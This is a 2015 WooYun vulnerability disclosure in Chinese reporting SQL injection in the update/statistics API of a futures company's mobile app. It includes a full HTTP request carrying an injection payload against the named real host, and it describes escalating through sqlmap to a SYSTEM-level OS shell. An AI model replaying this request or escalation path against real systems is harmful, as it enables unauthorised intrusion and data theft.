当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153193

漏洞标题:银河期贷某APP存在SQL注入(已提权system shell)

相关厂商:yhqh.com.cn

漏洞作者: 路人甲

提交时间:2015-11-10 09:02

修复时间:2015-11-23 05:56

公开时间:2015-11-23 05:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-10: 细节已通知厂商并且等待厂商处理中
2015-11-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

APP安全之SQL注入

详细说明:

目标:银河期贷APP文华随身行(软件列表下载:http://www.yhqh.com.cn/index.php?m=content&c=index&a=lists&catid=538)
检测发现以下地方存在SQL注入:(GET中的参数基本都可注入,如appVer/imei等共17个,Stacked queries)

GET http://update.wenhua.com.cn/News_Count_m/CountApi.asp?appFlag=1&appVer=4.5.1&beFrom=2,11&cpu=ARMv7%20Processor%20rev%202%20(v7l)&cpuNum=4&customFlag=0&display=1920x1080&dpi=480&frequency=384000KHZ&imei=A0000038000000&inFlag=0&mac=000000000000&memory=1825&model=ZTE%20Grand%20S&newsId=20151109MM0121&osVer=4.1.2&pNum=000000000000000&pTime=20151109213416&pTZone=28800&pZoneNam=%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4&sdklevel=16&siminfo=%E4%B8%AD%E5%9B%BD%E7%94%B5%E4%BF%A1/EVDO_A&size=-1%20OR%202%2b175-175-1%3d0%2b0%2b0%2b1%20--%20 HTTP/1.1
X-Requested-With: XMLHttpRequest
Cookie: ASPSESSIONIDQASSRRRR=NNLDAKEAFDIANLCEABDOLIOO
Host: update.wenhua.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

漏洞证明:

1、漏洞证明

sqlmap.jpg


2、列出所有库,共12个

dbs.jpg


3、列出当前数据库用户,为sa(dba)

user.jpg


4、由于是Stacked quries+dba,故执行os-shell查看当前系统用户身份,为最高控制权system

whoami.jpg


5、查看本地IP

ipconfig.jpg


其他就不深入了。

修复方案:

请多指教~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-23 05:56

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论